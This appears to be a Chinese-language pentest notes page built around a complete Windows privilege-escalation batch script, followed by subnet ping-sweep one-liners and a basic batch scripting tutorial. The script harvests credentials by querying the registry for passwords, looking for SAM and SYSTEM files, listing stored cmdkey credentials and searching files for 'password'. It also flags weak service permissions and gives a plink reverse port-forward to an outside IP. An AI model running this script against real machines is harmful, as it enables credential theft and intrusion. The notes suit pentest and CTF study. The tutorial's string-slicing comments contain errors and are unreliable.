批处理&提权命令

提权应用

批处理遍历webshell可访问目录

opendir、readdir、is_dir、is_writable这几个遍历文件夹的函数，在php限制的情况下，找可执行目录就没有优势了。

@echo off

(For /r c:\ %%a in (*) do echo %%~ta	%%~za	%%~fa)>list.txt

提权批处理脚本

@echo off

set userprofile=%cd%

mode con:cols=160 lines=9999

Cd c:\ 

echo ------ System Info (Use full output in conjunction with windows-exploit-suggester.py)-------

:: https://github.com/GDSSecurity/Windows-Exploit-Suggester

systeminfo

echo.

echo ----- Architecture -------

SET Processor

echo.

echo ------ Users and groups (check individual user with 'net user USERNAME' ) Check user privileges for SeImpersonate (rotten potato exploit) -------

:: Note, in CTF boxes its not uncommon to see other low level users on the machine. It can be a temptation to want to always skip to Administrator, but sometimes it is essential that you elevate privileges to that of a different user first before being able to get admin rights. Once you get that users rights, pay close attention to their user folder.

echo Current User: %username%

whoami /all

echo --- All users, accounts and groups ---

net users

net accounts

net localgroup

echo ------- Administrators --------

net localgroup administrators 

echo ------- Environment Variables -------

set

echo.

echo ------- Additional Drives (if not run as part of a batch job replace double percent with single percent sign)--------

for %%i in (a b d e f g h i j k l m n o p q r s t u v w x y z) do @dir %%i: 2>nul

echo.

echo ---------------------------------------- Search for Quick Wins --------------------------------------

echo -------- Listing contents of user directories ---------

:: In CTF machines it is VERY common for there to be artifacts used for privilege escalation within user directories. Pay special attention for files that may contain credentials, or files that maybe used as part of a scheduled task. You can typically ignore most default windows files (some of which have been filtered out as part of this script).

dir "C:\Users\" /a /b /s 2>nul | findstr /v /i "Favorites\\" | findstr /v /i "AppData\\" | findstr /v /i "Microsoft\\" |  findstr /v /i "Application Data\\"

dir "C:\Documents and Settings\" /a /b /s 2>nul | findstr /v /i "Favorites\\" | findstr /v /i "AppData\\" | findstr /v /i "Microsoft\\" |  findstr /v /i "Application Data\\"

echo.

echo -------- Exploring program directories and C:\ ---------

:: These directory listings are not recursive. They are meant to give you a general overview of the programs installed on the system. Searchsploit every (non default/windows) program version, and check each program config for creds.

echo --- Program Files ---

dir "C:\Program Files" /b

echo --- Program Files (x86) ---

dir "C:\Program Files (x86)" /b

echo --- Root of C:\ ----

dir "C:\" /b

echo.

echo --- Inetpub (any config files in here? May need to manually drill into this folder if it exists) ---

:: The root web folder can at times be extensive, and thus we do not always want to show a recursive listing of its contents in this script but it should always be investigated regardless.

dir /a /b C:\inetpub\ 

echo --- Broad search for Apache or Xampp ---

dir /s /b apache* xampp*

echo. 

echo ---Search for Configuration and sensitive files---

echo -- Broad search for config files --

:: If the .NET framework is installed you will get a bunch of config files which are typically default and can be ignored. The more you practice priv esc. the more youll learn which files can be ignored, and which you should give a closer eye to.

dir /s /b php.ini httpd.conf httpd-xampp.conf my.ini my.cnf web.config

echo -- Application Host File --

type C:\Windows\System32\inetsrv\config\applicationHost.config 2>nul

echo -- Broad search for unattend or sysprep files --

dir /b /s unattended.xml* sysprep.xml* sysprep.inf* unattend.xml*

echo -- Stored Passwords --

:: To use stored cmdkey credentials use runas with /savecred flag (e.g. runas /savecred /user:ACCESS\Administrator "ping 10.10.10.9")

cmdkey /list

echo.

echo -- Checking for any accessible SAM or SYSTEM files --

dir %SYSTEMROOT%\repair\SAM 2>nul

dir %SYSTEMROOT%\System32\config\RegBack\SAM 2>nul

dir %SYSTEMROOT%\System32\config\SAM 2>nul

dir %SYSTEMROOT%\repair\system 2>nul

dir %SYSTEMROOT%\System32\config\SYSTEM 2>nul

dir %SYSTEMROOT%\System32\config\RegBack\system 2>nul

dir /a /b /s SAM.b*

echo.

echo -- Broad search for vnc kdbx or rdp files --

dir /a /s /b *.kdbx *vnc.ini *.rdp

echo. 

echo --- Searching Registry for Passwords ---

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"

reg query HKLM /f password /t REG_SZ /s /k

reg query HKCU /f password /t REG_SZ /s /k

reg query "HKCU\Software\ORL\WinVNC3\Password"

reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"

reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

echo.

echo --- AlwaysInstallElevated Check ---

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

echo. 

echo --- Program Files and User Directories where everybody (or users) have full or modify permissions ---

icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"

icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"

icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"

icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"

icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone"

icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "Everyone"

icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"

icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"

icacls "C:\Documents and Settings\*" 2>nul | findstr "(F)" | findstr "Everyone"

icacls "C:\Documents and Settings\*" 2>nul | findstr "(M)" | findstr "Everyone"

icacls "C:\Documents and Settings\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"

icacls "C:\Documents and Settings\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"

icacls "C:\Users\*" 2>nul | findstr "(F)" | findstr "Everyone"

icacls "C:\Users\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"

icacls "C:\Users\*" 2>nul | findstr "(M)" | findstr "Everyone"

icacls "C:\Users\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"

icacls "C:\Documents and Settings\*" /T 2>nul | findstr ":F" | findstr "BUILTIN\Users"

icacls "C:\Users\*" /T 2>nul | findstr ":F" | findstr "BUILTIN\Users"

echo.

echo ... performing same checks but using cacls instead of icacls (for older versions of Windows)...

cacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"

cacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"

cacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"

cacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"

cacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone"

cacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "Everyone"

cacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"

cacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"

cacls "C:\Documents and Settings\*" 2>nul | findstr "(F)" | findstr "Everyone"

cacls "C:\Documents and Settings\*" 2>nul | findstr "(M)" | findstr "Everyone"

cacls "C:\Documents and Settings\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"

cacls "C:\Documents and Settings\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"

cacls "C:\Users\*" 2>nul | findstr "(F)" | findstr "Everyone"

cacls "C:\Users\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"

cacls "C:\Users\*" 2>nul | findstr "(M)" | findstr "Everyone"

cacls "C:\Users\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"

cacls "C:\Documents and Settings\*" /T 2>nul | findstr ":F" | findstr "BUILTIN\Users"

cacls "C:\Users\*" /T 2>nul | findstr ":F" | findstr "BUILTIN\Users"

echo. 

echo ---Domain joined? If so check domain controller for GPP files ----

set user

echo. 

cd %userprofile%

echo ---Unquoted Service Paths (requires that the directory from which this script is run is user writeable. If it is not, you can use the WMIC command below) ---

REM wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """

sc query state= all > scoutput.txt

findstr "SERVICE_NAME:" scoutput.txt > Servicenames.txt

FOR /F "tokens=2 delims= " %%i in (Servicenames.txt) DO @echo %%i >> services.txt

FOR /F %%i in (services.txt) DO @sc qc %%i | findstr "BINARY_PATH_NAME" >> path.txt

find /v """" path.txt > unquotedpaths.txt

sort unquotedpaths.txt|findstr /i /v C:\WINDOWS

del /f Servicenames.txt

del /f services.txt

del /f path.txt

del /f scoutput.txt

del /f unquotedpaths.txt

echo.

echo --------------- AccessChk (checks permissions for Authenticated Users, Everyone, and Users)------------------

reg.exe ADD "HKCU\Software\Sysinternals\AccessChk" /v EulaAccepted /t REG_DWORD /d 1 /f

echo --- Accesschk World writeable folders and files ----

accesschk.exe -uwdqs "Users" c:\ /accepteula

accesschk.exe -uwdqs "Authenticated Users" c:\ /accepteula

accesschk.exe -qwsu "Everyone" * /accepteula

accesschk.exe -qwsu "Authenticated Users" * /accepteula

accesschk.exe -qwsu "Users" * /accepteula

echo.

echo  --- Accesschk services with weak permissions ---

accesschk.exe -uwcqv "Authenticated Users" * /accepteula

accesschk.exe -uwcqv "Everyone" * /accepteula

accesschk.exe -uwcqv "Users" * /accepteula

echo.

echo  --- Accesschk services that we can change registry values for (such as ImagePath) ---

accesschk.exe -kvqwsu "Everyone" hklm\system\currentcontrolset\services /accepteula

accesschk.exe -kvqwsu "Authenticated Users" hklm\system\currentcontrolset\services /accepteula

accesschk.exe -kvqwsu "Users" hklm\system\currentcontrolset\services /accepteula

echo.

echo ---------------------------------------- End Search for Quick Wins --------------------------------------

cd c:\

echo ------- Powershell existence/version check -------

REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion 

echo ------- Network shares -------

net share

echo ------- Programs that run at startup ------

:: Note on some legacy Windows editions WMIC may fail to install/start/freeze in which case you'll need to comment out any calls to wmic

wmic startup get caption,command

echo -------- Path (is dll hijacking possible?) ------

echo Getting system + user path from command line (check permissions using cacls [path] or accesschk.exe -dqv [path])...

echo %path%

echo.

:: I couldnt find a way to only get system path in DOS (user path does not matter for the purpose of dll hijacking). If powershell is available you can use folderperm.ps1 script

:: https://github.com/ankh2054/windows-pentest/blob/master/Powershell/folderperms.ps1

:: powershell.exe -ExecutionPolicy Bypass -noLogo -Command "[Environment]::GetEnvironmentVariable('Path', [System.EnvironmentVariableTarget]::Machine)"

:: Or let the script do all the work for you

:: powershell.exe -executionpolicy bypass -file folderperm.ps1

echo ------- Scheduled Tasks Names Only -------

:: Look for any interesting/non-standard scheduled tasks, then view the scheduled task details list below to get a better idea of what that task is doing and who is running it).

schtasks /query /fo LIST 2>nul | findstr "TaskName"

echo.

echo ------- Scheduled Tasks Details (taskname, author, command run, run as user) -------

schtasks /query /fo LIST /v | findstr "TaskName Author: Run: User:"

echo.

echo ------- Services Currently Running (check for Windows Defender or Anti-virus) ---------

net start

echo.

echo ------- Link Running Processes to started services --------

tasklist /SVC

echo.

echo ------- Processes verbose output (who is running what?) --------

:: Pay close attention to this list. Especially for those tasks run by a user other than your own.

tasklist /v

echo.

echo ------- Patches (also listed as part of systeminfo) -------

:: Note on some legacy Windows editions WMIC may fail to install/start/freeze in which case you'll need to comment out any calls to wmic

:: Systeminfo may at times fail to list all patches (instead showing 'file x' or something along those lines) in which case its important to have this fallback.

wmic qfe get Caption,Description,HotFixID,InstalledOn 

echo ------- Firewall ------

netsh firewall show state

netsh firewall show config

netsh advfirewall firewall dump

echo ------ Network information ------

ipconfig /all

:: Routing and ARP tables accessible with these commands... uncomment if you wish, I didnt typically find them helpful for priv esc.

REM route print

REM arp -A

echo.

echo ------- Current connections and listening ports -------

:: Reverse port forward anything that is not accessible remotely, and run nmap on it. If SMB is available locally, do you have creds or hashes you can pass through it after port forwarding?

netstat -ano

echo.

echo ------- REVERSE PORT FORWARD MULTIPLE PORTS AT ONCE: plink.exe -l username -pw mysecretpassword -P [port] 10.11.0.108 -R 8080:127.0.0.1:8080 -R 8000:127.0.0.1:8000 -R 443:127.0.0.1:443 ------------

echo.

echo --- Broad search for any possible config files which may contain passwords ---

:: The following broad config file and credential searches could result in many results. They are meant as a fall back once you have already done thorough enumeration of user directories, web directories, and program directories (in addition to having pillaged the db).

dir /s /b *pass* *cred* *vnc* *.config*

echo.

echo --- Starting broad search in the background for any files with the word password in it. Press enter to get status occasionally --"

start /b findstr /sim password *.xml *.ini *.txt *.config *.bak 2>nul

echo.

Windows命令

登录3389的IP

netstat -an

netstat -an | find “3389″

系统信息

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

防火墙状态

netsh firewall show state

netsh firewall show config

计划任务

 schtasks /query /fo LIST /v

WMIC使用

脚本地址：http://www.fuzzysecurity.com/tutorials/files/wmic_info.rar

输出页面：http://www.fuzzysecurity.com/tutorials/files/Win7.html

无文件扫描

ping 整个 c 段，只输出有响应的主机。

for /l %i in (1,1,255) do @ping 192.168.1.%i -w 1 -n 1 | find /i "ttl"

域机器对应 IP

把 net view 的结果，挨个 ping 一遍，并输出机器名和 ip 地址。

FOR /F "eol=- tokens=1 delims=\ " %a IN ('net view') DO @(echo name: %a, ip: & ping %a -w 1 -n 1 | find /i "ttl" & echo.)

找主机名

for /l %i in (1,1,255) do @ping -a 10.0.1.%i -w 1 -n 1 | find /i "Pinging"

B 段查找

for /l %i in (1,1,255) do @ping -a 10.0.%i.1 -w 1 -n 1 | find /i "Pinging"

win7

for /l %i in (1,1,255) do @ping -a 10.0.1.%i -w 1 -n 1 | find /i "Pinging"

for /l %i in (1,1,255) do @ping -a 10.0.%i.1 -w 1 -n 1 | find /i "Pinging"

改成

for /l %i in (1,1,255) do @ping -a 10.0.1.%i -w 1 -n 1 | find /i "Ping"

for /l %i in (1,1,255) do @ping -a 10.0.%i.1 -w 1 -n 1 | find /i "Ping"

就可以兼容 Win7 了。（Win7 ping -a 输出结果关键词为 “Ping”）

另外

findstr /i "pinging" 或 findstr /i "ping" 可以换成 findstr "[" 的  可以适合多语言环境

批处理脚本教程

1. 遍历指定文件夹下的文件

1.1 命令解释

命令： for [参数] %%变量名 in （匹配符） do （执行的命令）

切记：每个指令之间必须以空格隔开，in 与 ( 之间有空格，do 与（间也有空格，否则命令会无法成功执行

ps：本节只讲用批处理脚本执行 for 命令遍历文件夹的场景，因此以下分析每个指令意义时，不介绍其他含义

[]：表示此项指令为可选

[参数]：参数取值一共有四种： /d, /r, /l, /f，加上无参数，所以一共五种场景

无参：遍历当前路径的文件夹下的文件，但也可在(匹配符)中指定路径
/d：遍历当前路径的文件夹下的文件夹，但也可在(匹配符)中指定路径
/r [路径]：深度遍历指定路径下的所有文件，子目录中的文件也会被遍历到，如果没指定路径，默认当前路径
/l ：当使用参数 /l 时，需结合(匹配符)一起使用，此时 () 括号内部的用法规则为：(start, step, end)，此时的 for 命令作用等同于 java 语言中的 for 语句
/f ：用于解析文件中的内容，本节不做介绍

%%变量名：作用类似于 for(int i = 0; ; ) 中的 int i = 0，有些区别点的就是，批处理的 for 循环遍历每一个子项时，%%变量名 <=> 每个子项，即 &&变量名 已经是指向具体的每个子项了

（匹配符）：在 in 指令之后 () 括号里的内容可表示为通配符，用于按照指定的规则过滤文件夹下的文件，如 (*.txt) 表示遍历文件夹内所有以 .txt 结尾的文件

(执行的命令)：前面的指令就可以取到文件夹内指定的每个子项了，那么接下去要对每个子项如何操作，就在这里写，类似于 java 的 for 命令后的 {} 大括号的作用

1.2 使用示例

以下示例基于上图中的文件路径，批处理脚本为 test.bat

无参：for %%i in (*) do ( echo %%i )

效果：遍历当前目录下的所有文件

无参指定路径：for %%i in (c:\softwares\VisualBat\*.url) do ( echo %%i )

效果：遍历在(匹配符)中指定路径下的以 .url 结尾的文件

带参数 /d：for /d %%i in (*) do ( echo %%i )

效果：遍历当前目录下所有的文件夹

带参数 /d 指定路径：for /d %%i in (c:\softwares\VisualBat\*) do ( echo %%i )

效果：遍历指定目录下的所有文件夹，%%i 指向每个子文件夹的绝对路径

带参数 /r ：for /r %%i in (*.url) do ( echo %%i )

效果：深度遍历当前路径下所有以 .url 结尾的文件，因为是深度遍历，因此 %%i 指向文件的绝对路径

带参数 /r 指定路径：for /r c:\softwares\VisualBat\ %%i in (*.url) do ( echo %%i )

效果：同上图
带参数 /l ：for /l %%i in (1, 1, 5) do ( echo %%i )

效果：等效于 java 中的 for (int i = 1; i <= 5; i++)语句，起始值，递增或递减，终止值都可自行设置

带参数 /d /r：for /d /r %%i in (*) do ( echo %%i )

效果：参数可结合使用，/d 表示遍历文件夹，/r 表示深度遍历，因此以上命令作用为深度遍历当前目录下的所有文件夹，包括子目录中的文件夹

2. 临时变量的使用

2.1 变量的基本用法

命令：set key=value

切记：key=value 三者之间绝对不能出现空格，不能为了像遵守 java 风格擅自给添加上空格，这与 java 的 int a = 1 声明变量不同，切记

变量使用：%key%

示例：

@echo off

set name=dasuAndroidTv

echo %name%

效果：name 可当做临时变量使用，使用时需用 %% 将变量名括起来使用

局限：不允许在 for 命令中类似上步中声明变量并直接使用，如下：

@echo off

for /l %%i in (0,1,5) do (

    set name=dasuAndroidTv

    echo %name%

)

效果：在 for 命令中声明临时变量，并直接通过 %key% 方式使用时会出现上图中的错误：ECHO 处于关闭状态，但如果 set key=value 临时变量的声明是放在 for 命令外部，for 命令内部只是使用的话，是可以的，如下：

@echo off

set name=dasuAndroidTv

for /l %%i in (0,1,5) do (

    echo %name%

)

效果：在 for 命令外部声明临时变量，for 命令内部只是使用，这种方式是允许的

2.2 变量在 for 命令中的用法

提问：那么如果要在 for 命令中才声明临时变量，并使用的话，该如何做？

for 命令中临时变量的使用：

需启用变量延迟功能，命令：setlocal enabledelayedexpansion
for 命令中的临时变量使用时用 !key! 感汉号括起来的形式代替 %key%
理由：不清楚，google 来的解决方案，感兴趣想深入研究的自行搜索

示例：

@echo off

setlocal enabledelayedexpansion

set name=dasu

for /l %%i in (0, 1, 5) do (

    set name=dasuAndroidTv

    echo !name!

    echo %name%

)

效果：说得白一点，在 for 命令中通过 %name% 方式使用的临时变量，取的 name 这个临时变量的值会一直是它在 for 命令外赋值的内容，即使在 for 命令中通过 set 命令对这个变量又重新赋值，也不会生效。

那么，如果需要在 for 命令中通过 set 命令赋值后的临时变量能够马上拿来使用，需要两个步骤，一在文件开头启用变量延迟功能，命令：setlocal enabledelayedexpansion，二在 for 命令中通过 !name!方式来使用临时变量。

3. 字符串处理

3.1 截取

命令：%key:~[start,num]%

解释：当 %key% 中出现了 :~，则表示要对 key 指向的这个字符串做截取操作，截取操作支持以下几种形式：

截取指定位置开始的 n 个字符串：%key:~0,4%，表示截取从下标 0 开始的之后 4 个字符
截取从指定位置开始的整个字符串：%key:~4%，表示截取从下标为 4 开始的整个字符串
截取通过倒数方式指定开始位置的整个字符串：%key:~-2%，表示截取从倒数第 2 个字符开始的整个字符串
截取通过倒数方式指定位置开始之后的 n 个字符串：%key:-4,2%，表示截取从倒数第 4 个字符开始的 2 个字符
正数倒数方式相结合：%key:~2,-2%，表示截取从下标 2 开始到倒数第 2 个之间的字符串

示例：

@echo off

rem (rem表示后面是注释的内容，类似于 java //)原始字符串

set name=dasuAndroidTv

rem 注释内容：表示截取从下标 0 开始的之后 4 个字符，输出 dasu

echo %name:~0,4%

rem 注释内容：表示截取从下标为 4 开始的整个字符串，输出 AndroidTv

echo %name:~4%  

rem 注释内容：表示截取从倒数第 2 个字符开始的整个字符串，输出 Tv

echo %name:~-2%

rem 注释内容：表示截取从倒数第 4 个字符开始的 2 个字符，输出 Android

echo %name:~4,-2%

rem 注释内容：表示截取从下标 2 开始到倒数第 2 个之间的字符串，输出 id

echo %name:~-4,2%

3.2 拼接

命令：%key1%%key2%

解释：将要拼接的那个字符串直接跟在被拼接的后面即可，不需要任何拼接操作符

示例：

@echo off

set name1=dasu

set name2=AndroidTv

echo %name1%%name2%

rem 这里是注释内容：输出 dasuAndroidTv

3.3 替换

命令：%key:被替换字符串=替换的字符串%

解释：不解释了，直接看示例，很容易明白

示例：

@echo off

set name=whoAndroidTv

echo %name:who=dasu%

rem 这里是注释内容：输出 dasuAndroid

3.4 文件特殊操作

如果是在 for 命令中遍历了某个文件夹下的文件，那么此时可以通过一些特殊命令来获取这个文件的各种信息，直接看示例：

@echo off

for %%i in (*.txt) do (

   echo %%i

   echo %%~fi

   echo %%~di

   echo %%~pi

   echo %%~ni

   echo %%~xi

   echo %%~ti

   echo %%~zi

)

解释：在通过 for 命令遍历文件时，%%i 根据不同的 for 使用方式，内容也有所不同，具体见第 1 节。在上述这种用法下，%%i 指向了当前目录下每个文件名，完整的文件名。

那么，此时就可以通过一些特殊命令来取得文件的相关信息，比如：

%%~fi：表示获取该文件的绝对路径信息
%%~di：表示获取该文件所在的盘符
%%~pi：表示获取该文件的路径，不包含盘符的信息
%%~ni：表示获取该文件的文件名，不包含扩展名信息
%%~xi：表示获取该文件的扩展名
%%~ti：表示获取该文件的上次修改时间
%%~zi：表示获取该文件的大小

3.5 截取某个指定字符前的部分

其他语言对字符串的处理基本都有类似 indexof 方法，在批处理中，可以用 for 语句对字符串进行处理来达到这种效果。

示例：

set name=woshidasusu_android

for /f "delims=_" %%i in ('echo %name%') do (

        echo %%i

)

输出：woshidasusu

参考

https://www.cnblogs.com/dasusu/p/9058554.html

http://www.fuzzysecurity.com/tutorials/16.html

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Windows - Privilege Escalation.md

https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/

https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/

https://github.com/frizb/Windows-Privilege-Escalation